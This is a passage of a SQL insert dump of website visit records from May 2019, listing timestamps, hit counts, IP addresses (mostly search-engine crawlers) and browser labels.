416983,1556873501,1,1,0,0,'5.45.207.80','other'),(416984,1556873525,1,1,0,0,'91.196.178.104','chrome'),(416985,1556873808,1,1,0,0,'95.132.42.95','chrome'),(416986,1556875993,2,2,0,0,'66.249.64.30','chrome'),(416987,1556876158,1,1,0,0,'157.55.39.247','other'),(416988,1556876295,1,1,0,0,'213.174.22.107','chrome'),(416989,1556877015,1,1,0,0,'95.163.255.197','other'),(416990,1556877267,1,1,0,0,'213.174.22.107','chrome'),(416991,1556877470,1,1,0,0,'157.55.39.247','other'),(416992,1556877521,1,1,0,0,'157.55.39.180','other'),(416993,1556877541,1,1,0,0,'178.154.244.21','other'),(416994,1556877727,1,1,0,0,'213.180.203.23','other'),(416995,1556877799,1,1,0,0,'213.180.203.48','other'),(416996,1556877893,1,1,0,0,'178.154.171.30','other'),(416997,1556877942,1,1,0,0,'87.250.224.107','other'),(416998,1556878577,1,1,0,0,'5.255.253.25','other'),(416999,1556878841,1,1,0,0,'141.8.142.38','other'),(417000,1556879133,1,1,0,0,'109.74.154.72','chrome'),(417001,1556879182,1,1,0,0,'157.55.39.180','other'),(417002,1556879549,2,2,0,0,'8.29.198.25','other'),(417003,1556879767,1,1,0,0,'66.249.64.30','chrome'),(417004,1556880128,2,2,0,0,'157.55.39.173','other'),(417005,1556880610,1,1,0,0,'157.55.39.247','other'),(417006,1556881242,2,2,0,0,'157.55.39.173','other'),(417007,1556881839,1,1,0,0,'157.55.39.247','other'),(417008,1556881886,1,1,0,0,'87.250.224.107','other'),(417009,1556881939,1,1,0,0,'95.108.181.75','other'),(417010,1556882198,1,1,0,0,'141.8.142.81','other'),(417011,1556882509,1,1,0,0,'91.196.178.130','chrome'),(417012,1556882665,1,1,0,0,'141.8.142.38','other'),(417013,1556884694,1,1,0,0,'91.209.11.236','other'),(417014,1556884852,3,3,0,0,'40.77.167.55','other'),(417015,1556885035,1,1,0,0,'87.250.224.81','other'),(417016,1556885142,1,1,0,0,'213.180.203.23','other'),(417017,1556885147,1,1,0,0,'141.8.142.65','other'),(417018,1556886185,1,1,0,0,'40.77.167.55','other'),(417019,1556886474,2,2,0,0,'66.249.64.30','chrome'),(417020,1556886523,1,1,0,0,'209.17.97.2','other'),(417021,1556887001,1,1,0,0,'157.55.39.187','other'),(417022,1556888355,1,1,0,0,'54.36.149.25','other'),(417023,1556888591,1,1,0,0,'141.8.183.23','other'),(417024,1556888592,1,1,0,0,'66.249.64.30','chrome'),(417025,1556888631,1,1,0,0,'95.132.7.20','firefox'),(417026,1556890265,1,1,0,0,'66.249.64.31','chrome'),(417027,1556890428,2,2,0,0,'8.29.198.25','other'),(417028,1556890577,1,1,0,0,'91.124.182.170','firefox'),(417029,1556890974,1,1,0,0,'87.250.224.118','other'),(417030,1556891116,1,1,0,0,'157.55.39.248','other'),(417031,1556891314,1,1,0,0,'66.249.64.31','chrome'),(417032,1556891397,1,1,0,0,'193.93.12.154','chrome'),(417033,1556891488,1,1,0,0,'157.55.39.187','other'),(417034,1556891605,1,1,0,0,'5.255.253.16','other'),(417035,1556891737,1,1,0,0,'178.154.244.21','other'),(417036,1556891779,2,2,0,0,'5.255.253.25','other'),(417037,1556891928,1,1,0,0,'213.180.203.9','other'),(417038,1556891990,1,1,0,0,'37.9.113.103','other'),(417039,1556892033,1,1,0,0,'213.180.203.48','other'),(417040,1556892036,1,1,0,0,'141.8.142.108','other'),(417041,1556893884,1,1,0,0,'91.196.178.40','chrome'),(417042,1556894620,1,1,0,0,'66.249.64.31','chrome'),(417043,1556895101,1,1,0,0,'95.135.210.85','chrome'),(417044,1556895123,1,1,0,0,'5.188.210.44','chrome'),(417045,1556895348,1,1,0,0,'87.250.224.81','other'),(417046,1556895509,1,1,0,0,'141.8.142.81','other'),(417047,1556896007,1,1,0,0,'40.77.167.143','other'),(417048,1556896307,1,1,0,0,'157.55.39.72','other'),(417049,1556896379,1,1,0,0,'95.108.181.75','other'),(417050,1556896391,1,1,0,0,'40.77.167.38','other'),(417051,1556897453,1,1,0,0,'109.173.39.17','msie'),(417052,1556897461,1,1,0,0,'176.14.249.243','msie'),(417053,1556897557,1,1,0,0,'66.249.64.58','chrome'),(417054,1556897938,1,1,0,0,'87.250.224.64','other'),(417055,1556898053,1,1,0,0,'87.250.224.47','other'),(417056,1556898220,1,1,0,0,'40.77.167.79','other'),(417057,1556898332,1,1,0,0,'213.180.203.17','other'),(417058,1556898415,1,1,0,0,'95.108.213.4','other'),(417059,1556898418,1,1,0,0,'95.108.181.83','other'),(417060,1556898753,1,1,0,0,'87.250.224.81','other'),(417061,1556898947,1,1,0,0,'5.45.207.80','other'),(417062,1556899061,1,1,0,0,'95.108.181.57','other'),(417063,1556900134,2,2,0,0,'207.46.13.121','other'),(417064,1556900747,1,1,0,0,'212.90.60.88','chrome'),(417065,1556901181,1,1,0,0,'66.249.64.60','chrome'),(417066,1556901287,1,1,0,0,'8.29.198.26','other'),(417067,1556901515,1,1,0,0,'8.29.198.25','other'),(417068,1556901702,1,1,0,0,'40.77.167.38','other'),(417069,1556902587,1,1,0,0,'5.45.207.8','other'),(417070,1556902687,1,1,0,0,'213.180.203.40','other'),(417071,1556904111,1,1,0,0,'91.196.178.40','chrome'),(417072,1556904784,1,1,0,0,'66.249.64.31','chrome'),(417073,1556905230,1,1,0,0,'157.55.39.232','other'),(417074,1556905321,1,1,0,0,'66.249.64.29','chrome'),(417075,1556905464,1,1,0,0,'95.163.255.173','other'),(417076,1556905616,1,1,0,0,'95.163.255.94','other'),(417077,1556905705,1,1,0,0,'95.163.255.168','other'),(417078,1556905962,1,1,0,0,'207.46.13.121','other'),(417079,1556906122,1,1,0,0,'93.158.166.7','other'),(417080,1556906292,1,1,0,0,'157.55.39.232','other'),(417081,1556906380,1,1,0,0,'178.154.171.30','other'),(417082,1556906461,1,1,0,0,'37.9.113.38','other'),(417083,1556906597,1,1,0,0,'5.255.253.25','other'),(417084,1556906717,1,1,0,0,'157.55.39.241','other'),(417085,1556907379,2,2,0,0,'66.249.64.29','chrome'),(417086,1556908482,1,1,0,0,'66.249.64.31','chrome'),(417087,1556908633,1,1,0,0,'157.55.39.232','other'),(417088,1556909254,2,2,0,0,'207.46.13.121','other'),(417089,1556909476,1,1,0,0,'157.55.39.252','other'),(417090,1556910359,1,1,0,0,'5.45.207.19','other'),(417091,1556911979,1,1,0,0,'157.55.39.241','other'),(417092,1556912158,2,2,0,0,'8.29.198.27','other'),(417093,1556913566,1,1,0,0,'91.196.178.173','chrome'),(417094,1556913986,1,1,0,0,'5.255.253.25','other'),(417095,1556914438,1,1,0,0,'157.55.39.241','other'),(417096,1556915272,1,1,0,0,'87.250.224.47','other'),(417097,1556915798,1,1,0,0,'5.45.207.76','other'),(417098,1556916596,1,1,0,0,'66.249.64.30','chrome'),(417099,1556916713,1,1,0,0,'157.55.39.252','other'),(417100,1556916804,1,1,0,0,'207.46.13.42','other'),(417101,1556917314,1,1,0,0,'95.163.255.99','other'),(417102,1556917913,1,1,0,0,'95.163.255.93','other'),(417103,1556917915,1,1,0,0,'95.163.255.98','other'),(417104,1556917935,1,1,0,0,'5.255.253.25','other'),(417105,1556918325,2,2,0,0,'157.55.39.241','other'),(417106,1556918368,2,2,0,0,'157.55.39.252','other'),(417107,1556918451,1,1,0,0,'95.108.181.54','other'),(417108,1556918469,1,1,0,0,'66.249.64.58','chrome'),(417109,1556918534,1,1,0,0,'141.8.183.11','other'),(417110,1556918718,1,1,0,0,'95.108.181.94','other'),(417111,1556918984,1,1,0,0,'54.36.149.39','other'),(417112,1556920563,1,1,0,0,'207.46.13.133','other'),(417113,1556921146,1,1,0,0,'178.154.171.30','other'),(417114,1556921174,1,1,0,0,'5.45.207.76','other'),(417115,1556921523,2,2,0,0,'157.55.39.252','other'),(417116,1556921748,1,1,0,0,'157.55.39.241','other'),(417117,1556923029,1,1,0,0,'8.29.198.26','other'),(417118,1556923233,1,1,0,0,'8.29.198.27','other'),(417119,1556923611,1,1,0,0,'95.163.255.173','other'),(417120,1556923856,1,1,0,0,'40.77.167.17','other'),(417121,1556924317,1,1,0,0,'5.45.207.19','other'),(417122,1556924339,1,1,0,0,'178.154.171.17','other'),(417123,1556924358,1,1,0,0,'157.55.39.252','other'),(417124,1556924405,2,2,0,0,'66.249.64.29','chrome'),(417125,1556924792,2,2,0,0,'141.8.142.144','other'),(417126,1556925023,1,1,0,0,'66.249.64.30','chrome'),(417127,1556925468,1,1,0,0,'157.55.39.252','other'),(417128,1556926244,1,1,0,0,'66.249.64.29','chrome'),(417129,1556926736,1,1,0,0,'95.108.181.54','other'),(417130,1556926989,1,0,1,0,'66.249.64.31',''),(417131,1556927328,1,1,0,0,'66.249.64.29','chrome'),(417132,1556927448,1,1,0,0,'157.55.39.211','other'),(417133,1556927491,2,2,0,0,'66.249.64.30','chrome'),(417134,1556927647,3,3,0,0,'66.249.64.31','chrome'),(417135,1556927722,1,1,0,0,'87.250.224.118','other'),(417136,1556928068,1,1,0,0,'95.163.255.188','other'),(417137,1556928393,1,1,0,0,'178.154.171.17','other'),(417138,1556928982,1,1,0,0,'87.250.224.118','other'),(417139,1556929255,1,1,0,0,'95.163.255.174','other'),(417140,1556929315,1,1,0,0,'95.163.255.191','other'),(417141,1556929343,1,1,0,0,'157.55.39.211','other'),(417142,1556930722,1,1,0,0,'213.180.203.40','other'),(417143,1556930842,1,1,0,0,'178.154.244.11','other'),(417144,1556931221,1,1,0,0,'87.250.224.64','other'),(417145,1556931540,1,1,0,0,'66.249.64.58','chrome'),(417146,1556932142,1,1,0,0,'40.77.167.17','other'),(417147,1556933256,1,1,0,0,'95.163.255.170','other'),(417148,1556933261,1,1,0,0,'178.154.244.65','other'),(417149,1556933581,1,1,0,0,'66.249.64.30','chrome'),(417150,1556933803,1,1,0,0,'213.180.203.40','other'),(417151,1556933892,2,2,0,0,'8.29.198.25','other'),(417152,1556934281,1,1,0,0,'66.249.64.58','chrome'),(417153,1556936408,1,1,0,0,'157.55.39.9','other'),(417154,1556936433,1,1,0,0,'5.45.207.80','other'),(417155,1556936698,1,1,0,0,'40.77.167.17','other'),(417156,1556937253,1,1,0,0,'40.77.167.15','other'),(417157,1556937265,1,1,0,0,'141.8.142.144','other'),(417158,1556937789,2,2,0,0,'34.208.222.113','chrome'),(417159,1556939141,1,1,0,0,'37.9.113.20','other'),(417160,1556939231,1,1,0,0,'5.255.253.38','other'),(417161,1556939267,1,1,0,0,'213.180.203.17','other'),(417162,1556940628,1,1,0,0,'180.76.15.6','other'),(417163,1556942122,1,1,0,0,'91.196.178.130','firefox'),(417164,1556942470,1,1,0,0,'207.46.13.63','other'),(417165,1556943133,2,2,0,0,'207.46.13.86','other'),(417166,1556943774,1,1,0,0,'66.249.64.30','chrome'),(417167,1556943816,23,23,0,0,'144.76.91.79','other'),(417168,1556944759,1,1,0,0,'8.29.198.27','other'),(417169,1556944939,1,1,0,0,'8.29.198.25','other'),(417170,1556944972,2,2,0,0,'209.141.45.212','chrome'),(417171,1556945009,1,1,0,0,'66.249.64.58','chrome'),(417172,1556945384,1,1,0,0,'37.9.113.20','other'),(417173,1556945509,1,1,0,0,'95.163.255.178','other'),(417174,1556945510,1,1,0,0,'213.180.203.17','other'),(417175,1556945556,1,1,0,0,'207.46.13.63','other'),(417176,1556945557,1,1,0,0,'95.163.255.171','other'),(417177,1556945683,1,1,0,0,'95.163.255.172','other'),(417178,1556945765,1,1,0,0,'213.180.203.9','other'),(417179,1556946334,1,1,0,0,'209.17.97.98','other'),(417180,1556948428,1,1,0,0,'66.249.64.31','chrome'),(417181,1556949160,1,1,0,0,'87.250.224.47','other'),(417182,1556949385,1,1,0,0,'141.8.132.16','other'),(417183,1556950285,1,1,0,0,'40.77.167.22','other'),(417184,1556950803,1,1,0,0,'178.154.244.49','other'),(417185,1556951898,1,1,0,0,'180.76.15.153','other'),(417186,1556952568,1,1,0,0,'40.77.167.6','other'),(417187,1556952684,55,55,0,0,'148.251.235.104','other'),(417188,1556953047,2,2,0,0,'213.180.203.53','other'),(417189,1556953054,1,1,0,0,'5.255.253.22','other'),(417190,1556953152,1,1,0,0,'37.9.113.148','other'),(417191,1556953255,1,1,0,0,'95.108.181.83','other'),(417192,1556953359,1,1,0,0,'95.108.181.75','other'),(417193,1556953651,1,1,0,0,'95.108.181.54','other'),(417194,1556953954,1,1,0,0,'178.154.171.69','other'),(417195,1556954090,1,1,0,0,'95.163.255.94','other'),(417196,1556954209,1,1,0,0,'46.211.120.42','chrome'),(417197,1556954475,1,1,0,0,'13.66.139.0','other'),(417198,1556955042,1,1,0,0,'178.154.171.24','other'),(417199,1556955051,1,1,0,0,'178.154.244.49','other'),(417200,1556955492,1,1,0,0,'40.77.167.22','other'),(417201,1556955636,2,2,0,0,'8.29.198.26','other'),(417202,1556955701,1,1,0,0,'40.77.167.6','other'),(417203,1556956025,1,1,0,0,'178.255.215.94','other'),(417204,1556957379,2,2,0,0,'157.55.39.9','other'),(417205,1556957630,1,1,0,0,'66.249.64.30','chrome'),(417206,1556957981,1,1,0,0,'37.9.113.20','other'),(417207,1556957983,1,1,0,0,'141.8.183.11','other'),(417208,1556958147,1,1,0,0,'95.163.255.158','other'),(417209,1556958803,1,1,0,0,'5.45.207.79','other'),(417210,1556958888,1,1,0,0,'141.8.183.23','other'),(417211,1556959158,1,1,0,0,'95.108.181.57','other'),(417212,1556959446,2,2,0,0,'40.77.167.6','other'),(417213,1556959723,2,2,0,0,'66.249.64.29','chrome'),(417214,1556959739,1,1,0,0,'5.45.207.80','other'),(417215,1556960808,1,1,0,0,'178.154.171.60','other'),(417216,1556960846,1,1,0,0,'66.249.64.30','chrome'),(417217,1556961099,1,1,0,0,'66.249.64.31','chrome'),(417218,1556962153,2,2,0,0,'40.77.167.45','other'),(417219,1556963770,1,1,0,0,'40.77.167.45','other'),(417220,1556964728,1,1,0,0,'40.77.167.79','other'),(417221,1556964743,1,1,0,0,'66.249.64.60','chrome'),(417222,1556964876,1,1,0,0,'109.74.154.72','chrome'),(417223,1556966253,2,2,0,0,'66.249.64.31','chrome'),(417224,1556966498,1,1,0,0,'8.29.198.27','other'),(417225,1556966499,1,1,0,0,'66.249.64.30','chrome'),(417226,1556966636,1,1,0,0,'8.29.198.26','other'),(417227,1556966945,1,1,0,0,'91.209.11.236','other'),(417228,1556967289,1,1,0,0,'66.249.64.29','chrome'),(417229,1556967740,1,1,0,0,'40.77.167.79','other'),(417230,1556967868,1,1,0,0,'141.8.142.65','other'),(417231,1556967905,1,1,0,0,'95.108.181.94','other'),(417232,1556967919,1,1,0,0,'95.108.181.57','other'),(417233,1556968010,1,1,0,0,'87.250.224.47','other'),(417234,1556968053,1,1,0,0,'5.45.207.80','other'),(417235,1556968420,12,12,0,0,'40.77.167.45','other'),(417236,1556968625,1,1,0,0,'165.227.218.177','other'),(417237,1556968829,1,1,0,0,'66.249.64.30','chrome'),(417238,1556968982,166,166,0,0,'91.209.51.22','other'),(417239,1556968991,1,1,0,0,'66.249.64.29','chrome'),(417240,1556969215,8,8,0,0,'157.55.39.202','other'),(417241,1556969224,22,22,0,0,'207.46.13.26','other'),(417242,1556969271,12,12,0,0,'40.77.167.79','other'),(417243,1556969324,9,9,0,0,'40.77.167.45','other'),(417244,1556969761,93,93,0,0,'5.9.144.234','other'),(417245,1556970667,1,1,0,0,'66.249.64.31','chrome'),(417246,1556970699,1,1,0,0,'40.77.167.123','other'),(417247,1556970944,1,1,0,0,'194.187.28.41','chrome'),(417248,1556971338,1,1,0,0,'66.249.64.30','chrome'),(417249,1556971694,1,1,0,0,'87.250.224.65','other'),(417250,1556971699,1,1,0,0,'40.77.167.119','other'),(417251,1556971725,1,1,0,0,'141.8.142.81','other'),(417252,1556971729,1,1,0,0,'180.76.15.25','other'),(417253,1556971883,1,1,0,0,'141.8.142.65','other'),(417254,1556971887,1,1,0,0,'5.45.207.8','other'),(417255,1556971966,33,33,0,0,'85.10.199.185','other'),(417256,1556972087,1,1,0,0,'66.249.64.31','chrome'),(417257,1556972190,2,2,0,0,'40.77.167.123','other'),(417258,1556973041,1,1,0,0,'40.77.167.139','other'),(417259,1556973611,1,1,0,0,'40.77.167.48','other'),(417260,1556973770,1,1,0,0,'66.249.64.60','chrome'),(417261,1556975046,1,1,0,0,'66.249.64.58','chrome'),(417262,1556975795,1,1,0,0,'37.9.113.103','other'),(417263,1556975961,1,1,0,0,'66.249.64.30','chrome'),(417264,1556976010,1,1,0,0,'141.8.183.11','other'),(417265,1556976032,1,1,0,0,'178.154.171.69','other'),(417266,1556976054,1,1,0,0,'5.45.207.19','other'),(417267,1556976187,1,1,0,0,'87.250.224.118','other'),(417268,1556976715,1,1,0,0,'66.249.64.31','chrome'),(417269,1556977010,1,1,0,0,'40.77.167.119','other'),(417270,1556977365,1,1,0,0,'8.29.198.26','other'),(417271,1556977477,1,1,0,0,'8.29.198.27','other'),(417272,1556977640,1,1,0,0,'207.46.13.82','other'),(417273,1556977669,1,1,0,0,'66.249.64.31','chrome'),(417274,1556978730,1,1,0,0,'13.66.139.0','other'),(417275,1556978898,84,84,0,0,'95.216.2.253','other'),(417276,1556978970,1,1,0,0,'95.163.255.167','other'),(417277,1556979228,1,1,0,0,'95.163.255.185','other'),(417278,1556980066,1,1,0,0,'87.250.224.47','other'),(417279,1556980119,1,1,0,0,'66.249.64.58','chrome'),(417280,1556980222,1,1,0,0,'141.8.142.38','other'),(417281,1556980280,1,1,0,0,'46.211.110.45','chrome'),(417282,1556980828,1,1,0,0,'37.9.113.20','other'),(417283,1556980964,1,1,0,0,'5.255.253.38','other'),(417284,1556981372,1,1,0,0,'40.77.167.17','other'),(417285,1556982070,1,1,0,0,'188.32.229.11','firefox'),(417286,1556982242,1,1,0,0,'178.154.244.11','other'),(417287,1556982273,1,1,0,0,'95.163.255.92','other'),(417288,1556982281,1,1,0,0,'95.163.255.170','other'),(417289,1556982619,1,1,0,0,'66.249.64.58','chrome'),(417290,1556982818,1,1,0,0,'66.249.64.30','chrome'),(417291,1556982919,1,1,0,0,'13.66.139.0','other'),(417292,1556983219,1,1,0,0,'5.255.253.38','other'),(417293,1556983222,1,1,0,0,'5.45.207.8','other'),(417294,1556983630,2,2,0,0,'66.249.64.31','chrome'),(417295,1556983784,1,1,0,0,'66.249.64.29','chrome'),(417296,1556984086,2,2,0,0,'141.8.142.81','other'),(417297,1556984217,1,1,0,0,'95.108.181.75','other'),(417298,1556984761,1,1,0,0,'95.163.255.167','other'),(417299,1556984808,1,1,0,0,'157.55.39.203','other'),(417300,1556985421,1,1,0,0,'66.249.64.29','chrome'),(417301,1556985635,1,1,0,0,'157.55.39.71','other'),(417302,1556986764,1,1,0,0,'66.249.64.30','chrome'),(417303,1556987828,1,1,0,0,'157.55.39.203','other'),(417304,1556987918,1,1,0,0,'141.8.142.191','other'),(417305,1556988178,2,2,0,0,'66.249.64.31','chrome'),(417306,1556988211,1,1,0,0,'8.29.198.27','other'),(417307,1556988330,1,1,0,0,'8.29.198.25','other'),(417308,1556988697,1,1,0,0,'157.55.39.211','other'),(417309,1556988717,1,1,0,0,'180.76.15.154','other'),(417310,1556989600,2,2,0,0,'157.55.39.203','other'),(417311,1556989867,2,2,0,0,'66.249.64.29','chrome'),(417312,1556990970,1,1,0,0,'157.55.39.149','other'),(417313,1556991080,1,1,0,0,'66.249.64.31','chrome'),(417314,1556991183,2,2,0,0,'5.45.207.79','other'),(417315,1556991201,1,1,0,0,'87.250.224.47','other'),(417316,1556991340,1,1,0,0,'95.163.255.177','other'),(417317,1556992292,1,1,0,0,'178.93.148.40','firefox'),(417318,1556992367,1,1,0,0,'157.55.39.203','other'),(417319,1556992494,2,2,0,0,'5.45.207.19','other'),(417320,1556992761,1,1,0,0,'66.249.64.29','chrome'),(417321,1556992877,1,1,0,0,'95.163.255.98','other'),(417322,1556992907,1,1,0,0,'141.8.142.103','other'),(417323,1556993049,1,1,0,0,'40.77.167.118','other'),(417324,1556993448,1,1,0,0,'66.249.64.31','chrome'),(417325,1556994034,1,1,0,0,'66.249.64.30','chrome'),(417326,1556995741,1,1,0,0,'5.45.207.19','other'),(417327,1556996049,1,1,0,0,'66.249.64.58','chrome'),(417328,1556997041,2,2,0,0,'40.77.167.118','other'),(417329,1556997045,1,1,0,0,'40.77.167.101','other'),(417330,1556998706,2,2,0,0,'66.249.64.31','chrome'),(417331,1556999062,2,2,0,0,'8.29.198.25','other'),(417332,1556999220,1,1,0,0,'40.77.167.101','other'),(417333,1556999307,1,1,0,0,'66.249.64.30','chrome'),(417334,1556999526,1,1,0,0,'178.154.244.11','other'),(417335,1557000605,1,1,0,0,'207.46.13.154','other'),(417336,1557000994,1,1,0,0,'207.46.13.38','other'),(417337,1557001681,1,1,0,0,'95.163.255.186','other'),(417338,1557002369,1,1,0,0,'95.163.255.94','other'),(417339,1557002706,2,2,0,0,'95.108.181.94','other'),(417340,1557002766,1,1,0,0,'5.45.207.76','other'),(417341,1557002770,1,1,0,0,'66.249.64.31','chrome'),(417342,1557002999,1,1,0,0,'66.249.64.30','chrome'),(417343,1557004540,1,1,0,0,'157.55.39.50','other'),(417344,1557004972,1,1,0,0,'66.249.64.29','chrome'),(417345,1557005565,1,1,0,0,'207.46.13.128','other'),(417346,1557006044,1,1,0,0,'66.249.64.31','chrome'),(417347,1557006652,1,1,0,0,'66.249.64.29','chrome'),(417348,1557006695,1,1,0,0,'66.249.64.30','chrome'),(417349,1557006950,1,1,0,0,'157.55.39.88','other'),(417350,1557007093,1,1,0,0,'95.108.181.57','other'),(417351,1557007277,1,1,0,0,'157.55.39.131','other'),(417352,1557007311,1,1,0,0,'213.180.203.48','other'),(417353,1557007358,1,1,0,0,'66.249.64.62','chrome'),(417354,1557007671,1,1,0,0,'66.249.64.30','chrome'),(417355,1557008752,2,2,0,0,'157.55.39.131','other'),(417356,1557009306,1,1,0,0,'95.163.255.94','other'),(417357,1557009673,1,1,0,0,'95.163.255.97','other'),(417358,1557009796,1,1,0,0,'91.196.178.92','chrome'),(417359,1557009937,1,1,0,0,'8.29.198.25','other'),(417360,1557010021,1,1,0,0,'8.29.198.27','other'),(417361,1557011027,1,1,0,0,'66.249.64.29','chrome'),(417362,1557011493,1,1,0,0,'66.249.64.30','chrome'),(417363,1557011841,1,1,0,0,'157.55.39.131','other'),(417364,1557013169,1,1,0,0,'66.249.64.29','chrome'),(417365,1557013329,2,2,0,0,'157.55.39.132','other'),(417366,1557013342,3,3,0,0,'157.55.39.131','other'),(417367,1557014019,1,1,0,0,'141.8.142.103','other'),(417368,1557014057,1,1,0,0,'95.163.255.154','other'),(417369,1557014082,1,1,0,0,'213.180.203.53','other'),(417370,1557014229,1,1,0,0,'213.180.203.61','other'),(417371,1557014373,1,1,0,0,'141.8.142.162','other'),(417372,1557014533,1,1,0,0,'66.249.64.29','chrome'),(417373,1557014778,1,1,0,0,'5.45.207.76','other'),(417374,1557015003,1,1,0,0,'157.55.39.132','other'),(417375,1557015070,1,1,0,0,'87.250.224.47','other'),(417376,1557015125,1,1,0,0,'37.9.113.38','other'),(417377,1557015243,1,1,0,0,'178.154.244.11','other'),(417378,1557015598,1,1,0,0,'95.108.181.75','other'),(417379,1557015601,1,1,0,0,'141.8.132.16','other'),(417380,1557015806,1,1,0,0,'66.249.64.29','chrome'),(417381,1557015893,1,1,0,0,'213.180.203.61','other'),(417382,1557016044,1,1,0,0,'207.46.13.50','other'),(417383,1557017695,1,1,0,0,'157.55.39.132','other'),(417384,1557017807,1,1,0,0,'66.249.64.29','chrome'),(417385,1557018044,1,1,0,0,'66.249.64.31','chrome'),(417386,1557018752,1,1,0,0,'93.158.166.7','other'),(417387,1557018786,1,1,0,0,'141.8.183.11','other'),(417388,1557018975,1,1,0,0,'95.108.181.75','other'),(417389,1557019621,1,1,0,0,'157.55.39.125','other'),(417390,1557020361,2,2,0,0,'157.55.39.131','other'),(417391,1557020790,2,2,0,0,'8.29.198.25','other'),(417392,1557021087,1,1,0,0,'157.55.39.125','other'),(417393,1557021447,1,1,0,0,'66.249.64.30','chrome'),(417394,1557021708,1,1,0,0,'66.249.64.60','chrome'),(417395,1557022135,1,1,0,0,'141.8.142.65','other'),(417396,1557022336,16,16,0,0,'157.55.39.205','other'),(417397,1557022783,18,18,0,0,'207.46.13.203','other'),(417398,1557022802,10,10,0,0,'207.46.13.50','other'),(417399,1557022829,10,10,0,0,'157.55.39.131','other'),(417400,1557023330,1,1,0,0,'178.154.171.24','other'),(417401,1557023404,1,1,0,0,'87.250.224.65','other'),(417402,1557023515,1,1,0,0,'141.8.142.65','other'),(417403,1557023982,1,1,0,0,'5.255.253.38','other'),(417404,1557024091,1,1,0,0,'87.250.224.47','other'),(417405,1557024105,1,1,0,0,'141.8.142.144','other'),(417406,1557024310,1,1,0,0,'93.158.166.7','other'),(417407,1557025152,1,1,0,0,'95.163.255.150','other'),(417408,1557025242,1,1,0,0,'95.163.255.98','other'),(417409,1557025279,1,1,0,0,'66.249.64.60','chrome'),(417410,1557025387,1,1,0,0,'157.55.39.131','other'),(417411,1557025927,1,1,0,0,'66.249.64.62','chrome'),(417412,1557026269,2,2,0,0,'34.219.36.160','chrome'),(417413,1557026417,1,1,0,0,'178.154.171.69','other'),(417414,1557026420,1,1,0,0,'141.8.183.23','other'),(417415,1557026534,1,1,0,0,'87.250.224.65','other'),(417416,1557026673,1,1,0,0,'66.249.64.31','chrome'),(417417,1557027954,1,1,0,0,'87.250.224.65','other'),(417418,1557029683,1,1,0,0,'66.249.64.29','chrome'),(417419,1557030119,1,1,0,0,'157.55.39.190','other'),(417420,1557030719,1,1,0,0,'66.249.64.31','chrome'),(417421,1557031193,1,1,0,0,'66.249.64.58','chrome'),(417422,1557031637,1,1,0,0,'8.29.198.27','other'),(417423,1557031727,1,1,0,0,'8.29.198.26','other'),(417424,1557031800,3,3,0,0,'157.55.39.190','other'),(417425,1557031818,1,1,0,0,'213.180.203.53','other'),(417426,1557033000,1,1,0,0,'157.55.39.190','other'),(417427,1557033194,1,1,0,0,'207.46.13.187','other'),(417428,1557033605,1,1,0,0,'66.249.64.62','chrome'),(417429,1557033612,1,1,0,0,'66.249.64.58','chrome'),(417430,1557034158,1,1,0,0,'66.249.64.29','chrome'),(417431,1557034216,1,1,0,0,'185.220.101.3','other'),(417432,1557034618,1,1,0,0,'178.154.171.17','other'),(417433,1557035230,1,1,0,0,'213.180.203.53','other'),(417434,1557035278,3,3,0,0,'207.46.13.202','other'),(417435,1557036124,1,1,0,0,'95.108.213.50','other'),(417436,1557037614,1,1,0,0,'185.120.89.69','chrome'),(417437,1557037623,1,1,0,0,'66.249.64.60','chrome'),(417438,1557037760,1,1,0,0,'207.46.13.134','other'),(417439,1557037997,2,2,0,0,'40.77.167.35','other'),(417440,1557038129,1,1,0,0,'66.249.64.58','chrome'),(417441,1557038140,1,1,0,0,'141.8.142.191','other'),(417442,1557038347,1,1,0,0,'207.46.13.39','other'),(417443,1557038638,1,1,0,0,'66.249.64.31','chrome'),(417444,1557038655,4,4,0,0,'66.249.64.30','chrome'),(417445,1557039424,1,1,0,0,'141.8.142.38','other'),(417446,1557039782,2,2,0,0,'40.77.167.35','other'),(417447,1557040108,1,1,0,0,'104.148.64.26','chrome'),(417448,1557040762,1,1,0,0,'95.24.201.54','msie'),(417449,1557040765,1,1,0,0,'95.84.186.86','msie'),(417450,1557041432,1,1,0,0,'66.249.64.30','chrome'),(417451,1557041870,1,1,0,0,'188.19.175.124','chrome'),(417452,1557041920,1,1,0,0,'141.8.142.38','other'),(417453,1557042015,1,1,0,0,'178.154.171.27','other'),(417454,1557042480,1,1,0,0,'8.29.198.27','other'),(417455,1557042568,1,1,0,0,'8.29.198.26','other'),(417456,1557043899,1,1,0,0,'178.95.111.127','other'),(417457,1557044995,1,1,0,0,'178.154.171.30','other'),(417458,1557045081,1,1,0,0,'87.250.224.65','other'),(417459,1557045497,1,1,0,0,'66.249.64.29','chrome'),(417460,1557046642,1,1,0,0,'95.163.255.93','other'),(417461,1557046701,1,1,0,0,'66.249.64.30','chrome'),(417462,1557046895,1,1,0,0,'40.77.167.164','other'),(417463,1557047073,1,1,0,0,'66.249.64.29','chrome'),(417464,1557047228,1,1,0,0,'207.46.13.134','other'),(417465,1557047243,1,1,0,0,'95.163.255.180','other'),(417466,1557047691,1,1,0,0,'51.68.152.26','chrome'),(417467,1557047722,2,2,0,0,'40.77.167.5','other'),(417468,1557048354,1,1,0,0,'5.255.253.25','other'),(417469,1557048599,1,1,0,0,'87.250.224.118','other'),(417470,1557049550,1,1,0,0,'66.249.64.30','chrome'),(417471,1557049897,1,1,0,0,'178.154.171.17','other'),(417472,1557050028,1,1,0,0,'40.77.167.164','other'),(417473,1557051003,1,1,0,0,'109.74.154.72','chrome'),(417474,1557051823,1,1,0,0,'95.163.255.156','other'),(417475,1557051939,1,1,0,0,'123.126.113.185','other'),(417476,1557052887,1,1,0,0,'178.154.244.49','other'),(417477,1557053069,1,1,0,0,'178.154.244.11','other'),(417478,1557053180,1,1,0,0,'178.154.171.17','other'),(417479,1557053313,2,2,0,0,'8.29.198.25','other'),(417480,1557054308,1,1,0,0,'40.77.167.5','other'),(417481,1557054313,1,1,0,0,'157.55.39.108','other'),(417482,1557054483,2,2,0,0,'66.249.64.31','chrome'),(417483,1557055043,1,1,0,0,'157.55.39.57','other'),(417484,1557055140,1,1,0,0,'207.46.13.49','other'),(417485,1557055743,1,1,0,0,'66.249.64.31','chrome'),(417486,1557055779,1,1,0,0,'157.55.39.108','other'),(417487,1557056239,1,1,0,0,'40.77.167.5','other'),(417488,1557056455,1,1,0,0,'95.163.255.189','other'),(417489,1557057485,1,1,0,0,'66.249.64.60','chrome'),(417490,1557057735,1,1,0,0,'95.108.213.4','other'),(417491,15570